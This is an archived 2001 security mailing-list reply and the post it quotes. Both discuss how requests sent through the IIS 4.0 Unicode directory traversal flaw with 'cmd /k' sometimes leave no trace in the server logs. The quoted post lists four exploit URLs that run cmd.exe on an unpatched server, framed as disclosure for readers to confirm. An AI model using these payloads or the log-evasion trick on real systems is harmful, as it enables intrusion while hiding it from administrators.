RE: sometimes IIS 4.0 don't write logs.

From: Pablo Aravena (p.aravenaat_private)
Date: Thu Dec 20 2001 - 05:48:45 PST

Next message: Pete Finnigan: "Re: How to trace system level call in AIX"

Previous message: ThEye: "sometimes IIS 4.0 don't write logs."
Maybe in reply to: ThEye: "sometimes IIS 4.0 don't write logs."
Next in thread: ThEye: "RE: sometimes IIS 4.0 don't write logs."
Reply: ThEye: "RE: sometimes IIS 4.0 don't write logs."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The problem looks like this:

	CMD /K [command]  Execute a command and "still active"
	CMD /C [command]  Execute a command and then finished.

	If you execute a cmd.exe?/k request this would be in active state
	until his finished this process instead of the cmd.exe?/c request
	that finishes the process inmediatly.  Because of this the IIS
that´s
	not log the process that has not come to an end.
		

Atentamente,
Pablo Aravena Martínez
Consultor de Seguridad
BYSECURE CSE S.A.
PGP FingerPrint: 4109 41C1 A295 75D8 F159  D542 96C5 5E6D 2B08 F28A
http://www.bysecure.com
mailto:p.aravenaat_private


> -----Mensaje original-----
> De:	ThEye [SMTP:theyeat_private]
> Enviado el:	jueves, 20 de diciembre de 2001 0:39
> Para:	vuln-devat_private
> CC:	ndr113at_private
> Asunto:	sometimes IIS 4.0 don't write logs.
> 
> <Hi:
> 
> I don't know if this problem is documented but i didn't find anything
> about 
> it anywhere.
> 
> The problem is the following one:
> 
> + Problem:
> When I was playing with "Microsoft IIS and PWS Extended Unicode Directory 
> Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the
> attacker 
> uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c) 
> ,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability) 
> sometimes don't write logs of the attacker's activity.
> 
> + Implications:
> If an attacker uses this vulnerability to crack a web page or anything, 
> eventually no tracks will exist on the attacked server.
> 
> + Final:
> In PROBLEM I said "sometimes" because after a high number of requests to 
> "cmd /k" , IIS 4.0 write logs of some requests, still I don't know when
> and 
> why IIS 4.0 write logs of the "cmd /k" request.
> Anyone that can confirm or refute this please post it.
> 
> 
> + Exploit:
> I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
> 
> ( without any patch ).
> 
> http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
> 
> Result: No tracks on log files.
> 
> + More Information:
> 1) Microsoft IIS and PWS Extended Unicode Directory Transversal
>  
> http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
> 2) Microsoft Patch prmcan4i
>  
> http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U
> S/prmcan4i.exe
> 
> Roberto Alamos M. (theyeat_private)
> www.350cc.com

Next message: Pete Finnigan: "Re: How to trace system level call in AIX"
Previous message: ThEye: "sometimes IIS 4.0 don't write logs."
Maybe in reply to: ThEye: "sometimes IIS 4.0 don't write logs."
Next in thread: ThEye: "RE: sometimes IIS 4.0 don't write logs."
Reply: ThEye: "RE: sometimes IIS 4.0 don't write logs."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 09:06:09 PST